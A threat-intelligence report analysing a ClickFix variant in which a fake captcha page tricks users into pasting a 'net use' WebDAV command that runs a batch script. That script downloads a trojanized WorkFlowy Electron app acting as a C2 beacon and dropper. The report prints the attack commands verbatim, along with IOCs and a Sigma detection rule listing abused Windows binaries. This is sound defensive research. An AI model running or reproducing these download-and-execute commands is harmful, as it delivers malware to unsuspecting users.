Investigating a New Click-Fix Variant

Investigating a New Click-Fix Variant The Hacker NewsMar 13, 2026Malware / Threat Hunting Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only. Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield  Summary Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed. Script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside “.asar” archive. This acts as a C2 beacon and a dropper for the final malware payload. Figure 1: High-level overview of attack flow. Attack overview In this version, the initial vector of attack is the same as in all the other ones, a web page posing as a captcha mechanism – “happyglamper[.]ro”. It prompts the user to open the Run application via “Win+R”, followed by “Ctrl+V” and “Enter” Figure 2: Phishing website 1 Figure 3: Phishing website 2 This executes the following command: “cmd.exe” /c net use Z: https://94.156.170[.]255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /delete Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that “net use” is being used to map and connect to a network drive of an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of infection patterns, this campaign gives Adversaries high chances to evade defensive controls and stay under the radar of defenders. In this case, the observed ClickFix variant of execution flow successfully bypassed the detection of Microsoft Defender for Endpoint. Atos security teams were able to detect it only thanks to the internal Threat Hunting service focusing on the main behavioral aspect of the ClickFix technique – initial execution through the RunMRU registry key (hunting query available in the Appendix section). The initial execution script “update.cmd” is loaded from the mapped drive and executed; after that, the mapped drive is removed. Content of “update.cmd”: start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\"; Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force; Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\"" This spawns a PowerShell instance which downloads a zip archive and extracts it into “%LOCALAPPDATA%\MyApp\” directory. Then it executes “WorkFlowy.exe” binary. Figure 4: Content of flowy.zip archive WorkFlowy analysis The archive contains a WorkFlowy desktop application (version 1.4.1050), signed by the developer “FunRoutine Inc.”, distributed as an Electron application bundle. Electron applications are written using popular web technologies – HTML, CSS, and JavaScript – and use “.asar” archives to pack source code during application packing. It is done for various reasons, like mitigating issues around long path names on Windows. The malicious code was injected into main.js, the Node.js entry point of the app, hidden inside the app.asar archive.  Technical Profile Property Value Target application WorkFlowy Desktop (Electron) Malicious version 1.4.1050 Malicious file resources/app.asar → /main.js C2 domain cloudflare.report/forever/e/ C2 origin IP 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud) Domain registered January 2026, HK registrant, OnlineNIC registrar Victim ID file %APPDATA%\id.txt Dropper staging dir %TEMP%\[unix_timestamp]\ Infection Vector The malicious ASAR archive is a direct replacement for the legitimate resources/app.asar. The attacker repackaged an older version of the app (v1.4 vs. the current v4.3) with injected code.  Figure 5: Content of "resources" subdirectory Malicious Code (Dropper/Beacon) When WorkFlowy is executed, it looks for app.asar file in the relative path hardcoded into the binary. It then reads the main.js file from inside of it, decodes it to a string, and parses it to the embedded V8 Google JavaScript engine, which executes it. Attackers have replaced the legitimate main.js with one they have created themselves. Instead of well-structured scripts, they have used heavily obfuscated on-liner structure, adding malicious code on top of legitimate one, ensuring it is executed first and blocking WorkFlowy functionality. Malicious code contains several critical functions: Malware executes before the legitimate application starts: The injected IIFE opens with await f() — the infinite C2 beacon loop. Because f() never resolves, all legitimate WorkFlowy initialization code that follows is permanently blocked. The malware runs with full Node.js privileges immediately on launch. Persistent victim fingerprinting via %APPDATA%\id.txt: A random 8-character alphanumeric ID is generated on first run and written to %APPDATA%\id.txt. On subsequent runs, the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions. C2 beacon — exfiltrates host identity every 2 seconds: Function u() sends an HTTP POST containing the victim's unique ID, machine name, and Windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval. Remote payload download and execution: Function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec. If the C2 connection is not established, no files or directories are generated. At the time of this analysis, the C2 domain was already unresponsive. Why Electron is an Effective Delivery mechanism The malicious code runs in the Node.js main process - outside the Chromium sandbox - with the full privileges of the logged-in user, allowing for the malicious code to execute any actions the user is allowed to do on the system. No files are actually written to disk, and since the malicious payload is packed inside “.asar” archive, it additionally helps to hide malicious code. Persistence No OS-level persistence is implemented via the dropper. The beacon runs only while WorkFlowy is open. The only artifact written to disk before next stage delivery is %APPDATA%\id.txt (victim tracking ID), and that is only if the connection to C2 is established correctly. Presumably, an OS-level persistence is delegated to whatever payload the C2 delivers via the dropper. Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield Key takeaways This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism. Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living‑off‑the‑land binaries that are heavily monitored by modern EDR solutions. In contrast, this iteration mounts a remote WebDAV share as a local drive, executes a hosted batch file through standard filesystem semantics, and removes the mapping immediately after use. This shows that ClickFix still evolves, expanding its arsenal of proxy execution methods and starting to utilize native networking utilities. The malicious logic is hidden by replacing the content of the Workflowy application’s app.asar archive with a trojanized version of main.js. Because the code runs inside the Electron main process and remains packaged within a legitimate application, it avoids many file‑based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility. This activity was not detected by security controls and was only identified through targeted threat hunting at Atos. Detection relied on analyzing execution context rather than payload indicators, specifically hunting for suspicious command execution originating from the Explorer Run dialog (recorded inside the RunMRU Registry Key). This underscores the growing importance of threat hunting as a complementary detection mechanism: as ClickFix campaigns shift toward native utilities and trusted applications that generate few alerts, only proactive, hypothesis-driven hunting can help surface these weak signals early enough to disrupt the attack chain. Appendixes IOCs Domain cloudflare[.]report Domain happyglamper[.]ro IP 94[.]156[.]170[.]255 IP 144[.]31[.]165[.]173 URL https://cloudflare[.]report/forever/e/ File %APPDATA%\id.txt Path %TEMP%\[13-digit-timestamp]\ SHA256 a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar) SHA256 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe – Older version of legitimate binary, not malicious) SHA256 dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js) Hunting Query title: Suspicious Commands executed via Run dialog  id: 20891a30-032e-4f15-a282-fa4a8b0d8aae status: experimental description:  Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key (commonly used for Run dialog history), with explorer.exe as the initiating process. author: TRC date: 2026-03-05 tags: - attack.execution - attack.t1059 - attack.defense_evasion logsource: category: registry_set product: windows definition: "Sysmon Event ID 13 (Registry value set) or equivalent EDR registry telemetry" detection: selection_key: TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' selection_proc: Image|endswith: '\explorer.exe' selection_data: Details|contains: - 'cmd ' - 'powershell ' - 'cmd.exe ' - 'powershell.exe ' - 'wscript.exe ' - 'cscript.exe ' - 'net.exe ' - 'net1.exe ' - 'sh.exe ' - 'bash.exe ' - 'schtasks.exe ' - 'regsvr32.exe ' - 'hh.exe ' - 'wmic.exe ' - 'mshta.exe ' - 'rundll32.exe ' - 'msiexec.exe ' - 'forfiles.exe ' - 'scriptrunner.exe ' - 'mftrace.exe ' - 'AppVLP.exe ' - 'svchost.exe ' - 'msbuild.exe ' condition: selection_key and selection_proc and selection_data falsepositives: - "Legitimate administrative activity using Run dialog (Win+R) to execute built-in tools." - "IT scripts or troubleshooting steps executed interactively by a user." level: medium Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  Command Execution, cybersecurity, Malware, Phishing, Supply Chain Security, Threat Hunting, Threat Intelligence, WebDAV, windows security Trending News New Chrome Vulnerability Let Malicious Extensions Escalate Privileges via Gemini Panel 149 Hacktivist DDoS Attacks Hit 110 Organizations in 16 Countries After Middle East Conflict APT28 Tied to CVE-2026-21513 MSHTML 0-Day Exploited Before Feb 2026 Patch Tuesday ⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack and Vibe-Coded Malware ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1 Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited Starkiller Phishing Suite Uses AitM Reverse Proxy to Bypass Multi-Factor Authentication Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model ThreatsDay Bulletin: DDR5 Bot Scalping, Samsung TV Tracking, Reddit Privacy Fine and More Popular Resources Read CYBER360 2026: From Zero Trust Limits to Data-Centric Security Paths Self-Hosted WAF: Block SQLi, XSS, and Bots Before They Reach Your Apps Identity Controls Checklist: Find Missing Protections in Apps 19,053 Confirmed Breaches in 2025 – Key Trends and Predictions for 2026